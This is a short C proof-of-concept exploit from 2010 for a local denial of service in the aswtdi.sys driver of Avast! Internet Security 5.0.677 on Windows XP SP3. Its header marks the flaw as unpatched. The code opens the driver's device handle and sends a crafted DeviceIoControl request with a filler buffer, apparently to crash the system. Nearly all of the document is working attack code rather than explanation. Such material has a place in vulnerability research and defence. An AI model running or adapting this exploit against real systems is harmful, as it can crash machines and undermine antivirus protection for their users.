|
/* # Exploit Title: Avast! Internet Security aswtdi.sys 0day Local DoS PoC # Date: 2010-11-04 # Author: Nikita Tarakanov (CISS Research Team) # Software Link: http://www.avast.com # Version: up to date, version 5.0.677, aswtdi.sys version 5.0.677 # Tested on: Win XP SP3 # CVE : CVE-NO-MATCH # Status : Unpatched */ #include <windows.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <io.h> #include <fcntl.h> #include <sys/types.h> #include <sys/stat.h> #include <errno.h> #include <share.h>
int main(int argc, char **argv) { HANDLE hDevice; DWORD cb; void *buff; int len = 0; int pfh; int outlen = 0, inlen = 0; DWORD ioctl = 0x800515A8; char deviceName[] = "\\\\.\\aswTdi";
if ( (hDevice = CreateFileA(deviceName, GENERIC_READ|GENERIC_WRITE, 0, 0, OPEN_EXISTING, 0, NULL) ) != INVALID_HANDLE_VALUE ) { printf("Device succesfully opened!\n"); } else { printf("Error: Error opening device \n"); return 0; }
cb = 0; buff = malloc(0x2000); if(!buff){ printf("malloc failed"); return 0; } memset(buff, 'A', 0x2000-1); ioctl = 0x80000004; inlen = 4;
outlen = 4; DeviceIoControl(hDevice, ioctl, (LPVOID)buff, inlen, (LPVOID)buff, outlen, &cb, NULL); free(buff);
printf("done!"); }
|